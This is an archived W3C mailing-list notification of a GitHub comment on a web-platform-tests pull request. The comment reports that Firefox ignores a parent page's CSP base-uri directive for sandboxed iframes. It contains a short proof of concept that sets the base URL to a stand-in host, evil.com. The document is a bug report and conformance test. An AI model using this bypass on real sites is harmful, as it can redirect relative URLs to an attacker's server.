Re: [CSP] Test for base-uri and sandboxed iframes. (#4915) from Michele Spagnuolo on 2017-03-14 (public-web-platform-tests-notifications@w3.org from March 2017)

From: Michele Spagnuolo <web-platform-tests-notifications@w3.org>
Date: Tue, 14 Mar 2017 10:32:51 GMT
To: public-web-platform-tests-notifications@w3.org
Message-Id: <<web-platform-tests_issue_4915_1489487571350@w3.org>>

I confirm that Firefox allows setting `<base>` for sandboxed iframes ignoring the `base-uri` directive of the parent page.

PoC:

```
<meta charset="utf-8">
<meta http-equiv="Content-Security-Policy" content="base-uri 'none'">

<body>
    <script>
        var i = document.createElement('iframe');
        i.sandbox = 'allow-scripts';
        i.srcdoc = '<base href="https://evil.com/"><script>console.log(document.baseURI);</sc' + 'ript>';
        document.body.appendChild(i);
    </script>
</body>
```

prints ``https://evil.com/`` to the console, while commenting out  the ``i.sandbox`` line we get a CSP violation, as it should be.

View on GitHub: https://github.com/w3c/web-platform-tests/pull/4915#issuecomment-286382069

Received on Tuesday, 14 March 2017 10:33:03 UTC